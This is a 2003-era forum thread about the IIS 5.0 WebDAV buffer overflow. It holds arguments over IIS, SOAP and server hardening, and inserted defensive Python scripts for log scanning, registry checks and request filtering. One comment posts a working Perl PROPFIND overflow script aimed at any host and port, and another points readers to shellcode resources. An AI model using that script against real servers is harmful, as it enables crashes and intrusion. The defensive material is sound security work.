Gone are the days where each vulnerability found was shouted from the rooftops till someone noticed the researcher. Now they just root servers with unfettered access until someone figures out that it's a new vulnerability. E.g. they bypass all IDS and in this case most firewalls.
For the record, it seems like this is a simple buffer overflow (when will they learn?) so tools like URLScan and SecureIIS stop these attacks. If you're running an IIS server it would be a REALLY good idea to invest in either of these. Since they both stop all forms of buffer overflows (and various other types of attack) they don't require a patch to fend off these types of attacks.
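The comment above says attackers "bypass all IDS", which in practice means nobody was looking at the IIS logs for the shape of these requests. The following is an added example, not code from the thread or from Microsoft, that scans IIS W3C extended log lines for WebDAV verbs, oversized URLs and oversized request bodies. The log lines are constructed for illustration, the `MAX_URL_LEN` and `MAX_CS_BYTES` thresholds are assumptions (not URLScan's defaults), and the `cs-bytes` field is only present if the server was configured to log it.

```python
"""Scan IIS W3C extended log lines for WebDAV requests that look abusive.

Added example, not from the original thread. The log below is constructed;
the thresholds are assumptions chosen to illustrate the idea.
"""
from collections import Counter

# RFC 2518 WebDAV verbs plus SEARCH, the DASL extension IIS also handles.
WEBDAV_VERBS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE",
                "LOCK", "UNLOCK", "SEARCH"}
MAX_URL_LEN = 1024     # assumed cap on cs-uri-stem length
MAX_CS_BYTES = 65536   # assumed cap on bytes sent by the client

# Constructed sample log (IIS 5.0 W3C extended format). The third and fourth
# request lines mimic a WebDAV probe with an oversized body and an oversized URL.
SAMPLE_LOG = "\n".join([
    "#Software: Microsoft Internet Information Services 5.0",
    "#Version: 1.0",
    "#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs-bytes",
    "2003-03-17 10:01:02 192.0.2.10 GET /index.htm - 200 312",
    "2003-03-17 10:01:09 192.0.2.10 GET /images/logo.gif - 200 290",
    "2003-03-17 10:02:41 198.51.100.7 PROPFIND / - 207 128211",
    "2003-03-17 10:02:42 198.51.100.7 SEARCH /" + "A" * 70000 + " - 500 70120",
    "2003-03-17 10:03:00 192.0.2.11 OPTIONS / - 200 120",
])


def parse_w3c(text):
    """Yield one dict per request line, using the #Fields directive for column names."""
    fields = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#"):
            if line.startswith("#Fields:"):
                fields = line[len("#Fields:"):].split()
            continue
        if fields is None:
            raise ValueError("request line before #Fields directive")
        values = line.split(" ")
        if len(values) != len(fields):
            continue  # malformed line: skip rather than guess at columns
        yield dict(zip(fields, values))


def classify(rec):
    """Return the list of reasons a record is suspicious (empty if none)."""
    reasons = []
    method = rec.get("cs-method", "")
    if method in WEBDAV_VERBS:
        reasons.append("webdav-verb:" + method)
    if len(rec.get("cs-uri-stem", "")) > MAX_URL_LEN:
        reasons.append("oversized-url")
    try:
        if int(rec.get("cs-bytes", "0")) > MAX_CS_BYTES:
            reasons.append("oversized-request")
    except ValueError:
        pass  # cs-bytes logged as "-" or garbage: no size signal available
    return reasons


def scan(text):
    """Return (findings, per_ip_counts) for a W3C log text."""
    findings = []
    per_ip = Counter()
    for rec in parse_w3c(text):
        reasons = classify(rec)
        if reasons:
            findings.append((rec["c-ip"], rec["cs-method"], reasons))
            per_ip[rec["c-ip"]] += 1
    return findings, per_ip


if __name__ == "__main__":
    hits, by_ip = scan(SAMPLE_LOG)
    for ip, verb, why in hits:
        print(ip, verb, ", ".join(why))
    print("sources:", dict(by_ip))
```

On the constructed log this reports the two requests from 198.51.100.7 and nothing for the ordinary GET and OPTIONS traffic. A request that crashes the worker before it is logged will not appear here, so pair this with the network-level view (firewall or proxy logs) rather than relying on it alone.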
So... you think you shouldn't be dumping it just for breaching standards, being slow, sucking resources and Being Written By Microsoft With Malice Aforethought?
I personally don't think you should be dumping it because of a few security holes, I think you should be dumping it for having lots of security holes.
Got time? Spend some of it coding or testing
"You can run IIS under any user."
Reference to where this is a supported configuration?
It would break WebDAV (see subject) for sure.
Used to do some neat stuff with WebDav, if it's still around
Vote Quimby!
If your site is not blindly prejudiced against Windows I would expect this article to appear on your site some time. It's a buffer overflow. It also says you are crazy to enable Samba on a box attached to the Internet. You are also crazy not to use the IIS lockdown tool that stops Windows buffer overflows. I prefer Windows because I can make amazing software on that OS and I cannot do much more than 'hello world' on a Linux system. Article: "Linux firms look to plug Samba hole: The open-source community is pushing customers to patch their systems to close a hole in a software component that allows Windows programs to store and retrieve files on Linux and Unix servers." http://www.zdnet.com.au/newstech/os/story/0,2000024997,20272953,00.htm
It's no less secure than Apache.
HAHAHAHAHAHAHAHA!
Napster-to-go says "Fill and refill your compatible MP3 player", which is a lie. It's not MP3. It's WMA with DRM.
The Samba issue was posted a couple of days ago...
http://developers.slashdot.org/article.pl?sid=03/03/15/181253&mode=thread&tid=172&tid=148
As one of those who configure their firewall to only allow specific traffic through, I'd say the 25,000 packets it blocked in the past week indicates a lot of traffic I'm glad didn't get through to my network.
And, if one of my users can prove the need for and security of an application having access from/to the internet, it takes less than a minute for me to allow access to that port and address.
I think it's really time for me to convince my boss to switch to Apache! I mean being pro-MS/IIS whatever doesn't make sense. Why the hell do people use IIS when Apache for Windows is freaking stable like a rock? Oh I see, they are too dumb to double-click download, go through a Wizard and install Apache.
hmmm.
Just change the user the service runs under.
Gee, if it was that simple, I wonder why MS isn't telling everyone to do it.
Want to do RPC? Sure! Just tunnel it through port 80!
Well, SOAP is designed to allow applications to have access to the kind of context-full information humans would have access to through the web anyway.
You're not sending anything that wouldn't have been sent anyway.
Take the Google webservice as an example. You can make RPC calls to Google over port 80 -- but it's not much different from a human doing a manual Google search from a browser.
Err, no.
It is an RPC mechanism which is primarily layered on top of HTTP. Don't make the mistake that just because it typically uses HTTP for transport, or is used in "Web Services" that it will only be used in a benign way, or that it is benign by design.
People are already starting to use it for mission critical RPC. It is a disaster waiting to happen.
/mike
-- "So, what's the deal with Auntie Gerschwitz et all?"
It's nice to get worked up about all these holes and patches but if half the jokers who are running NT/2000 boxes for a living would just do their job they wouldn't have a problem.
:P
I've had my servers configured (locked down) the same way for the last year and a half and guess what....none of these vulnerabilities (including that lame SQL worm) made any difference to me. I was already protected all because I did a little research into what other people (who have time to research this stuff) said about how to properly harden a MS server (web or db). Oh and there's this neat thing called IISLockdown that disables WebDAV for you IF YOU RUN IT! Oh and it's part of an even neater thing called Microsoft Baseline Security Analyzer that helps you do lots of other stuff. That's only been around for a year or more. But hey, don't worry about it now. If you've got a MS server on the web and don't know what I (or anyone else here) am talking about then your servers are prolly hosed anyway. There's no excuse for bad admin.
Oh and before I get any lame "oh, you must not have them plugged in then...yuk yuk yuk" comments, yes they are plugged in. To the Internet in a datacenter even.
And no, you can't have the IP.
The advantage is that most managers don't like radical changes. Once you have everything you need running under CYGWIN and the next MS OS bug appears, you can very easily drop Win2K and move to Linux because your apps are already Linux compatible.
Well I guess it's ok to make mistakes, as long as you're doing it with Linux. Welcome to /.
Err, no
Err yes! That's what it was designed for. A way of allowing website <-> website communication as well as thickclient <-> website communication.
It is an RPC mechanism which is primarily layered on top of HTTP. Don't make the mistake that just because it typically uses HTTP for transport, or is used in "Web Services" that it will only be used in a benign way, or that it is benign by design.
People are already starting to use it for mission critical RPC. It is a disaster waiting to happen.
Um. Kind of like how people are using HTTP and the web for mission critical *manual* data input and presentation?
Slash removed my arrows.
The third sentence should be:
A way of allowing website <-> website communication as well as thickclient <-> website communication.
Test your server...
#!/usr/bin/perl
# Written by Georgi Guninski
# Usage: propfind.pl <host> <port>
# Sends two PROPFIND requests whose XML body carries an oversized element name.
use strict;
use warnings;
use IO::Socket;
print "IIS 5.0 propfind\n";
my ($host, $port) = @ARGV;
die "usage: $0 host port\n" unless defined $host && defined $port;
sub vv
{
    my $ll = $_[0];  # length of buffer
    my $ch = $_[1];
    my $over = $ch x $ll;  # string to overflow
    my $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp") || return;
    #my $xml = '<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over".':"><a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
    # ^^^^ This is another issue and also works with length ~>65000
    my $xml = '<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."over".':"><a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
    my $l = length($xml);
    my $req = "PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
    syswrite($socket, $req, length($req));
    print ".";
    my $res;
    $socket->read($res, 300);  # read the start of the reply, if the server still answers
    #print "r=".$res;
    close $socket;
}
vv(128008, "V");  # may need to change the length
sleep(1);
vv(128008, "V");
print "Done.\n";
... and then there were none
No, you are still wrong. SOAP really has nothing to do with web sites.
It *can* be used by web sites to provide an API for programmatic access to that site's data and functionality, but using SOAP in this manner is actually quite redundant: You can do the same thing without SOAP and in a more architecturally sound manner.
This is beside the point, however. SOAP has nothing to do with the web, or web sites, other than the fact it uses HTTP as its default transport.
SOAP was a spin-off of XML-RPC. Dave Winer developed XML-RPC as a simple RPC mechanism for Userland Frontier, to allow other applications to integrate with it. Microsoft picked XML-RPC up (probably because it is very buzzword-compliant, and can easily get through those pesky firewalls), turned it into an RPC mechanism for "objects" - which is a lie, they basically just gave it an extensible type system - and let it loose. See XML-RPC for Newbies for a more detailed early history.
No, it is being used for RPC (Remote Procedure Call) - a form of IPC (Inter-Process Communications). This is far more dangerous. People are exposing programmatic interfaces to mission-critical systems. These interfaces allow other computers to manipulate data on those remote mission-critical systems. Think of having direct access to Amex's customer database vs. having access to their web site. It is a massively different situation.
/mike
-- "So, what's the deal with Auntie Gerschwitz et all?"
response.write "Who needs a damn debugger"
Got Code?
Sitting on security vulnerabilities until several fixes are available and releasing them as one advisory is a good trick to try to reduce the overall number of advisories, without actually having to improve the quality or security of the product.
For a while patches were announced on Thursdays and for a while before that it was Fridays. Fridays must have run too much overtime and shown up on the boardroom radar. Thursday in Seattle is already Friday in Europe so maybe this is a play to get MSTD-induced overtime back off the radar of European managers. With a legal cap of around 37.5 hours per week per tech, business can't afford too many IIS servers.
It is strange that any would try to. Microsoft-IIS is not a viable alternative to Zeus or Apache.
Beta is broken and the link to classic doesn't work. Stop wasting our time or there won't be anybody left here.
ROTFL
Please, mod up parent.
It's like The Birds only with little pieces of paper attached to their legs.
"Care to explain how you would do it in a more "architecturally sound manner"?"
For a web site? Use REST. For anything else? Use a well designed IPC protocol.
"If there's a programming flaw that allows you access to Amex's customer database it could just as easily occur in the website."
Sigh. If a security hole is found in a webserver, the impact will likely be far, far less than if a hole is found in a SOAP implementation. The difference is what people are going to do with the technology, and how they are going to do it. What SOAP's role in a software architecture is. A web site won't let you *directly* query customer records, or *directly* make purchases. A SOAP API will.
"SOAP definitely has its place".
No it doesn't. It violates the Web and Internet architectures. It makes it easy to get around network security. It piggy-backs on application-level protocols which it shouldn't. It pretends to not be an application-level protocol when it is.
Whilst it looks nice, SOAP is quite fundamentally broken.
-- "So, what's the deal with Auntie Gerschwitz et all?"
..... I'm getting really bored with this one.....
I could not agree with you more. Conventional Internet style network security is based on the convention that we expose different services on different well known ports. To control access to those services we simply control access to these ports. Consequently a firewall doesn't have to parse the content of packets or understand the details of higher level protocols, it simply has to know which ports to allow and which to block. This means that firewall processes can be lightweight and efficient.
If you overload a port to provide many different services on the same port this security model doesn't work any longer. You can no longer trust any traffic to any port. Instead, you need a much more complex firewall which (inter alia) can parse soap packets and decide which soap packets to pass and which to block. This makes the firewall much more complex and much more processor (and memory) intensive.
I could not agree with you less. Port overloading is completely inimical to network security. Once undereducated code monkeys are able to put J Random Soap Handler on port 80, either you block port 80 or you have no network security left.
I'm old enough to remember when discussions on Slashdot were well informed.
go to deepzone.org for shellcode and shellcode generator. anyone know how long the buffer overflow has to be?
How on earth can anyone seriously think about using .net, that for all intents *forces* you to use IIS (a.k.a. the Instant Intrusion Service)?
Seems like it's about time to rename IIS to Apache (a patchy)?
HiPerExchange is a WebDAV server that runs on the machines of individual email users, allowing them to efficiently access email using Outlook Web Access. See the HiPerExchange Technology Primer for more detailed information.
So that's why Microsoft responded so promptly in fixing this bug! National Security and all that!
I mean relatively promptly given that Microsoft is involved!
I thought that Chairman Bill said that it would all be as easy as point 'n click?
It never occurred to me until I read the parent to do this for the (sigh) 2 servers I have to run IISs on for a specific app. Copy and paste this into a text file (notepad) named disableWebDAV.reg, then double-click to add to any registry:
REGEDIT4
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters]
"DisableWebDAV"=dword:00000001
I am, and always will be, an idiot. Karma: Coma (mostly effected by
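The registry value above and the "IIS runs as LocalSystem" argument elsewhere in this thread both come down to two values under the W3SVC service key, so a practitioner wants a check for both rather than taking either side's word for it. The following is an added example, not from the thread or from Microsoft. It assumes that the service logon account is stored in the service key's ObjectName value and that a missing ObjectName means LocalSystem; the evaluation logic is kept separate from the registry reads so it can be run against values collected from a fleet, and the reads themselves only work on Windows.

```python
"""Assess an IIS 5.0 host's WebDAV and service-account settings.

Added example, not from the original thread. assess() is pure and portable;
assess_local_host() reads the live registry and therefore needs Windows.
"""
import sys

W3SVC_KEY = r"SYSTEM\CurrentControlSet\Services\W3SVC"
PARAMS_KEY = W3SVC_KEY + r"\Parameters"
# Spellings under which the service control manager records the built-in
# system account (assumed list; extend it if your hosts use another form).
PRIVILEGED_ACCOUNTS = {"localsystem", ".\\localsystem", "nt authority\\system"}


def assess(disable_webdav, object_name):
    """Return findings from the two settings.

    disable_webdav: value of W3SVC\\Parameters\\DisableWebDAV, or None if absent
    object_name:    value of W3SVC\\ObjectName (the service logon account), or
                    None if absent, which the SCM treats as LocalSystem (assumed)
    """
    findings = []
    if disable_webdav is None or int(disable_webdav) == 0:
        findings.append("webdav-enabled")
    account = (object_name or "LocalSystem").lower()
    if account in PRIVILEGED_ACCOUNTS:
        findings.append("w3svc-runs-as-localsystem")
    return findings


def read_value(root, subkey, name):
    """Read one registry value; return None when the key or value is missing."""
    import winreg
    try:
        with winreg.OpenKey(root, subkey) as key:
            value, _ = winreg.QueryValueEx(key, name)
            return value
    except FileNotFoundError:
        return None


def assess_local_host():
    """Collect the two values from HKLM on this machine and assess them."""
    import winreg
    disable = read_value(winreg.HKEY_LOCAL_MACHINE, PARAMS_KEY, "DisableWebDAV")
    account = read_value(winreg.HKEY_LOCAL_MACHINE, W3SVC_KEY, "ObjectName")
    return assess(disable, account)


if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("registry reads need Windows; call assess() with collected values elsewhere")
    for finding in assess_local_host():
        print(finding)
```

A clean result is an empty list: DisableWebDAV set to a non-zero DWORD and ObjectName pointing at a dedicated service account. Whether running W3SVC under such an account is a supported configuration is disputed further down this thread, so treat the second finding as information rather than a verdict.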
As much as I hate NineNine's stinking and corrupted guts, he is correct. You can change the user that IIS runs as very easily. (I've only worked with IIS 4.0 up to this point) Just open the services control panel applet, scroll down to World Wide Web Publishing service and set the user account for IIS to run as.
However, I will make an observation here: NO internet server can be secured if it's shipped with default settings since default settings cannot remain secure indefinitely. If a server admin MUST explicitly specify server settings, then you will have a more secure server because it will result in uniqueness. MS is horrible at this because you can install IIS and it "just works" without the admin EVER being prompted to secure the server's configuration. I believe they've changed that a bit with IIS 5 but can't speak for it since I don't know it. But if MS really wanted to go the extra mile with security they would make the IIS lockdown tool a required PART OF THE SETUP!!!
One of the reasons that Apache is perceived as more secure than IIS is that for most people the default settings are not usable, so they HAVE to edit the config file. This forces them to notice that Apache is probably running as 'nobody' and a few other settings that they probably don't want ticked on or off. If the admin is smart, he changes this setting and uses the chroot options. (Damn wouldn't it be nice if chroot was an option in Windows?)
Un-news
The default configuration of URLScan prevents the vulnerability from being exploited. URLScan is a part of the IIS Lockdown tool. For more information about URLScan, visit the following Microsoft Web site: http://www.microsoft.com/technet/security/URLScan.asp
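What a request filter like URLScan actually does is cheap and worth seeing in code: before the server core parses anything, it rejects verbs outside an allowlist and requests whose URL, header lines or declared body are larger than a fixed cap. The following is an added example, not URLScan's code and not from the thread. The allowlist and limits are assumptions chosen to illustrate the idea rather than URLScan's shipped defaults, and the sample requests are constructed; the last one has the shape of the PROPFIND probe posted earlier in this discussion.

```python
"""Request-limit filter in the spirit of URLScan.

Added example, not from the original thread. Limits and verb list are
assumptions for illustration, not URLScan's defaults.
"""

ALLOWED_VERBS = {"GET", "HEAD", "POST"}   # assumed allowlist; WebDAV verbs deliberately absent
MAX_URL = 260                             # assumed cap on the request-line path
MAX_QUERY = 2048                          # assumed cap on the query string
MAX_CONTENT_LENGTH = 1_000_000            # assumed cap on the declared body size
MAX_HEADER_LINE = 4096                    # assumed cap on any single header line

# Constructed sample requests.
NORMAL_GET = b"GET /index.htm HTTP/1.1\r\nHost: www.example.test\r\n\r\n"
LONG_URL_GET = b"GET /" + b"A" * 70000 + b" HTTP/1.1\r\nHost: www.example.test\r\n\r\n"
BIG_POST = (b"POST /form.asp HTTP/1.1\r\nHost: www.example.test\r\n"
            b"Content-Length: 5000000\r\n\r\n")
PROPFIND_PROBE = (b"PROPFIND / HTTP/1.1\r\nContent-type: text/xml\r\n"
                  b"Host: www.example.test\r\nContent-length: 128211\r\n\r\n"
                  b'<?xml version="1.0"?><a:propfind xmlns:a="DAV:"><a:prop/></a:propfind>')


def screen(raw):
    """Return (True, "ok") if the request head passes the limits, else (False, reason).

    Only the head is inspected: the point is to decide before reading the body.
    """
    norm = raw.replace(b"\r\n", b"\n")
    head, _, _ = norm.partition(b"\n\n")
    lines = head.split(b"\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3:
        return False, "malformed-request-line"
    verb = parts[0].decode("latin-1")
    target = parts[1].decode("latin-1")
    if verb not in ALLOWED_VERBS:
        return False, "verb-not-allowed:" + verb
    path, _, query = target.partition("?")
    if len(path) > MAX_URL:
        return False, "oversized-url"
    if len(query) > MAX_QUERY:
        return False, "oversized-query"
    headers = {}
    for line in lines[1:]:
        if len(line) > MAX_HEADER_LINE:
            return False, "oversized-header-line"
        name, sep, value = line.partition(b":")
        if not sep:
            return False, "malformed-header"
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    if "content-length" in headers:
        try:
            length = int(headers["content-length"])
        except ValueError:
            return False, "malformed-content-length"
        if length < 0 or length > MAX_CONTENT_LENGTH:
            return False, "content-length-exceeds-limit"
    return True, "ok"


if __name__ == "__main__":
    for label, req in [("normal GET", NORMAL_GET), ("long URL", LONG_URL_GET),
                       ("big POST", BIG_POST), ("PROPFIND probe", PROPFIND_PROBE)]:
        print(label, "->", screen(req))
```

The ordering matters: the verb check runs first so a WebDAV request is refused without any of its body being read, and the size checks are on declared and observed lengths, not on content, which is why a filter like this needs no knowledge of the particular overflow to stop it. It is a mitigation, not a fix: anything that reaches the server over a path the filter does not see (another listener, a local client) is unaffected, so the patch still has to go on.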
Prevent linux based DDOS's!
http://linux.denialofservice.org/
Planning ahead, same as prepense. Which admittedly doesn't characterise Microsoft products very well. (-:
Got time? Spend some of it coding or testing
This is from "Microsoft Security Bulletin MS03-007" Frequently asked questions:
Why has Microsoft changed the information in the Caveats section of this bulletin?
Microsoft was made aware that some customers who had received a hotfix from Product Support Services experienced stop errors on boot after applying the patch released for this bulletin.
We've assessed this issue and now know that it only occurs under a specific set of circumstances. A series of Windows 2000 hotfixes that were only available through Product Support Services and were issued between December 2001 and February 2002 were incompatible with the patch for this vulnerability. Customers who are running one of those 12 hotfixes on Windows 2000 Service Pack 2 will experience a stop error on reboot after applying this patch. More information on how to determine if you have installed a hotfix that is incompatible with this patch is available in the Additional Information section under Caveats.
Customers who are running Windows 2000 Service Pack 3 or are not running one of these hotfixes will not encounter this problem.
to patch or not to patch....
The problem is, although you _can_ do this, it's not a supported setting, and will cause a lot of things to break (namely the things people rely on IIS for in the first place).
Engineering and the Ultimate
Like all of Microsoft's more baroque products, WebDAV is an attempt to make life easier for the technically clueless. Its design reflects what I call the Wizard Fallacy: the assumption that you can make a complicated process easy by glossing it over with some hand-holding software. This never works well, but requires less imagination than inventing a new procedure that's easy to understand and use.
The society which scorns excellence in plumbing as a humble activity and
tolerates shoddiness in philosophy because it is an exalted activity will
have neither good plumbing nor good philosophy... neither its pipes nor
its theories will hold water.
- this post brought to you by the Automated Last Post Generator...